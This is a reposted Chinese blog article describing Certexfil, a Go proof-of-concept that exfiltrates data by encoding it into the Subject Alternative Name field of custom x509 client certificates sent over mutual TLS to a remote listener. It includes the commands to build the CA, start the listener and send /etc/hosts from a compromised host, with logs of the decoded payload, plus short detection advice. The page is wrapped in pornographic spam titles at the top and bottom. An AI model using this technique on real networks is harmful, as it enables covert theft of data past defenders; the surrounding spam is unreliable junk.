欧美一区二区三区老妇人-欧美做爰猛烈大尺度电-99久久夜色精品国产亚洲a-亚洲福利视频一区二区

如何利用x509數(shù)字證書實(shí)現(xiàn)數(shù)據(jù)滲透

這篇文章主要介紹如何利用x509數(shù)字證書實(shí)現(xiàn)數(shù)據(jù)滲透,文中介紹的非常詳細(xì),具有一定的參考價(jià)值,感興趣的小伙伴們一定要看完!

成都創(chuàng)新互聯(lián)-專業(yè)網(wǎng)站定制、快速模板網(wǎng)站建設(shè)、高性價(jià)比建寧網(wǎng)站開發(fā)、企業(yè)建站全套包干低至880元,成熟完善的模板庫(kù),直接使用。一站式建寧網(wǎng)站制作公司更省心,省錢,快速模板網(wǎng)站建設(shè)找我們,業(yè)務(wù)覆蓋建寧地區(qū)。費(fèi)用合理售后完善,10年實(shí)體公司更值得信賴。

數(shù)據(jù)泄露可能是內(nèi)部人員和黑客的主要目標(biāo)。因此,你就需要思考如何發(fā)送這些數(shù)據(jù)。

我發(fā)現(xiàn)大多數(shù)公司對(duì)這方面的問題幾乎沒有什么防護(hù)措施(例如,中間人代理和TLS攔截),檢測(cè)通常也少的可憐......但有時(shí),這可能是一個(gè)挑戰(zhàn)。

對(duì)于工作和業(yè)余愛好,我圍繞數(shù)據(jù)混淆和隱蔽通道編寫了大量的工具,并總是在為構(gòu)建更好的安全檢測(cè)和改善響應(yīng)時(shí)間做努力。 

本文我們將討論如何將數(shù)據(jù)嵌入到自定義SSL證書中,并通過(guò)mTLS針對(duì)一個(gè)遠(yuǎn)程偵聽服務(wù)來(lái)使用它。

這是作為POC而寫的,也是我在Go中的編寫第一個(gè)程序。

從 TLS 到 mTLS?

TLS(安全傳輸層協(xié)議)是一種加密協(xié)議,用于在客戶端和服務(wù)器之間提供通信安全性。為此,證書頒發(fā)機(jī)構(gòu)(“CA”)會(huì)為服務(wù)器頒發(fā)一個(gè)簽名證書,以向客戶端證明其身份。該客戶端可以檢查證書,并查看簽名的CA是否真正受信任。

雖然TLS主要是對(duì)服務(wù)器進(jìn)行身份驗(yàn)證,但Mutual TLS添加了客戶端的身份驗(yàn)證,該身份驗(yàn)證將由受信任的CA提供簽名證書。

x509 證書濫用

X509證書可以使用主題別名或SAN進(jìn)行擴(kuò)展。

如何利用x509數(shù)字證書實(shí)現(xiàn)數(shù)據(jù)滲透

這意味著我們可以在證書創(chuàng)建期間添加字面量(literal)值,這些值可以是從電子郵件,IP到DNS名稱的任何內(nèi)容。

同樣,可以在此SAN中添加任何內(nèi)容,這里并沒有真正的驗(yàn)證,只需使用DNS: (.*)的格式即可。

那么,我們是否可以在這個(gè)位置隱藏一段我們的payload代碼呢?即 DNS: base64(content)。

如何利用x509數(shù)字證書實(shí)現(xiàn)數(shù)據(jù)滲透

Certexfil

它有三種模式:

使用 — ca創(chuàng)建客戶端和偵聽端都使用的CA架構(gòu);

使用 — listen,啟動(dòng)一個(gè)mTLS偵聽器(你需要來(lái)自 — ca的CA文件)

使用 — payload和 — host,將payload(文件,stdout)注入自定義客戶端證書,然后立即用它連接到偵聽服務(wù)。

代碼可以在這里找到:https://github.com/sourcefrenchy/certexfil

Certexfil 加密 payload

我使用了一個(gè)簡(jiǎn)單的編碼模塊對(duì)payload進(jìn)行了base64編碼,但在這個(gè)階段似乎沒有什么用。顯然,我需要在某一點(diǎn)上做些加密,或者我應(yīng)該將它重命名為encodepayload :)。為此,我在go中創(chuàng)建了一個(gè)用于加密payload的模塊cryptopayload。

代碼可以在這里找到:https://github.com/sourcefrenchy/cryptopayload

用法

創(chuàng)建CA/服務(wù)器證書

這將創(chuàng)建包含用于mTLS的server_cert.pem和server_key.pem證書的./CERTS目錄(客戶端和偵聽模式將使用這些目錄:

somewhere$ certexfil -ca -ecdsa-curve P521 -host remote.server.com

現(xiàn)在,請(qǐng)確保你的遠(yuǎn)程服務(wù)器上有certexfil二進(jìn)制文件和創(chuàng)建的./CERTS目錄。然后,啟動(dòng)偵聽(默認(rèn)為:所有接口,tcp/8443)

remoteserver$ ./certexfil -listen

客戶端/受妥協(xié)主機(jī)發(fā)送 payload

在本例中,我們嘗試通過(guò)生成自定義證書并建立與遠(yuǎn)程偵聽器的mTLS連接,來(lái)對(duì)我們的“/etc/hosts”文件進(jìn)行數(shù)據(jù)泄露,所有這些操作只需下面這一行命令:

06:52:14 jma@wintermute Go-Workspace → certexfil --host remote.server.com --payload /etc/hosts
2019/05/31 18:52:23 [*] Reading from file..
2019/05/31 18:52:24 [D] Payload (raw)  --> 127.0.0.1	...(225 bytes)
2019/05/31 18:52:24 [D] Payload (Prepare()) --> ?...		(173 bytes)
2019/05/31 18:52:24 [*] Generated custom cert with payload
Oo

我們可以在本地檢查創(chuàng)建的新證書(client_cert.pem)和SAN區(qū)域中添加的payload(base64)。讓我們使用openssl再檢查一遍:

$ openssl x509 -in ./CERTS/client_cert.pem -text -noout 
 grep -A 5 "Subject Alternative Name"
            X509v3 Subject Alternative Name: 
                DNS:x.io.net, DNS:
H4sIAAAAAAAC/0TNMa7DIAwG4DmcwtKbH4IMqcQNunXoBQgxDaoDCJOmx69o08abP1v/r/uTVFJJ3VFylubEVXxMS91tIVYsy1pRiD+4zgg+EaUtxBtQiMhgC8KEHIodqV0LnC+PAZzNb2h6LIzR0Cbk4f9Xs28pj9bdhUeljFHHS8QqvD9wcZZrLujDs3nfMptbopgm5B37L5a0ViwsXgEAAP//pJPCNuEAAAA=    Signature Algorithm: ecdsa-with-SHA512
         30:81:88:02:42:01:aa:73:a9:af:03:4f:21:16:dd:62:4a:af:
         59:6b:89:f5:a6:6d:e6:f1:21:40:ff:c8:32:f7:99:4f:d9:c8:
         7f:b3:ac:43:1f:71:09:86:f4:be:7b:af:93:31:e2:fb:ec:e8:

檢索偵聽端上的 payload

驗(yàn)證客戶端連接提供的證書后,我們可以檢索payload,從base64解碼并顯示它:

○ → ./certexfil --listen
2019/05/31 22:51:01 [*] Starting listener..
2019/05/31 22:52:24 [*] Payload received: H4sIAAAAAAAC/0TNMa7DIAwG4DmcwtKbH4IMqcQNunXoBQgxDaoDCJOmx69o08abP1v/r/uTVFJJ3VFylubEVXxMS91tIVYsy1pRiD+4zgg+EaUtxBtQiMhgC8KEHIodqV0LnC+PAZzNb2h6LIzR0Cbk4f9Xs28pj9bdhUeljFHHS8QqvD9wcZZrLujDs3nfMptbopgm5B37L5a0ViwsXgEAAP//pJPCNuEAAAA=
2019/05/31 22:52:24 [*] Payload decoded: 127.0.0.1	localhost
127.0.1.1	wintermute
# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

限制

tls:的握手消息長(zhǎng)度為1399109字節(jié),已超過(guò)了最大值65536字節(jié)。

OpenSSL不允許大小超過(guò)65536字節(jié)的證書

TODO:將大型payload拆分為多個(gè)證書和/或重新編譯OpenSSL

緩解措施

假設(shè)你已截獲并分析SSL流量的一些想法:)

檢測(cè)新創(chuàng)建的TLS證書

檢測(cè)大型TLS證書或檢查SAN以獲取有效的DNS條目(例如,你可以使用某些BroIDS腳本)

正確配置Man-in-the-Middle代理/防火墻攔截TLS流量

以上是“如何利用x509數(shù)字證書實(shí)現(xiàn)數(shù)據(jù)滲透”這篇文章的所有內(nèi)容,感謝各位的閱讀!希望分享的內(nèi)容對(duì)大家有幫助,更多相關(guān)知識(shí),歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道!

本文題目:如何利用x509數(shù)字證書實(shí)現(xiàn)數(shù)據(jù)滲透
網(wǎng)頁(yè)路徑:http://chinadenli.net/article0/gpcdio.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供品牌網(wǎng)站制作、響應(yīng)式網(wǎng)站網(wǎng)站改版、Google、用戶體驗(yàn)、定制開發(fā)

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)

成都網(wǎng)頁(yè)設(shè)計(jì)公司
欧美有码黄片免费在线视频| 人妻少妇av中文字幕乱码高清| 精品人妻一区二区三区免费| 欧美丰满人妻少妇精品| 午夜福利国产精品不卡| 中文字幕一区二区三区大片| 黄色国产自拍在线观看| 亚洲免费视频中文字幕在线观看 | 午夜福利大片亚洲一区| 九九热精品视频免费在线播放| 99热九九在线中文字幕| 天堂网中文字幕在线视频| 国产精品内射婷婷一级二级| 天海翼高清二区三区在线| 欧美一区二区三区性视频| 黄色激情视频中文字幕| 日韩国产中文在线视频| 免费在线播放一区二区| 免费观看在线午夜视频| 高跟丝袜av在线一区二区三区| 日韩一区二区三区18| 福利专区 久久精品午夜| 欧美日韩乱码一区二区三区| 日韩三级黄色大片免费观看| 午夜精品一区二区av| 欧美日韩一区二区三区色拉拉| 国产日韩欧美一区二区| 扒开腿狂躁女人爽出白浆av| 一区二区三区在线不卡免费| 激情亚洲内射一区二区三区| 丰满人妻一二区二区三区av| 97精品人妻一区二区三区麻豆| 最新69国产精品视频| 国产中文字幕一区二区| 最好看的人妻中文字幕| 精品国自产拍天天青青草原| 日本午夜免费福利视频| 99热九九热这里只有精品| 中文字幕一区二区免费| 富婆又大又白又丰满又紧又硬| 在线免费国产一区二区|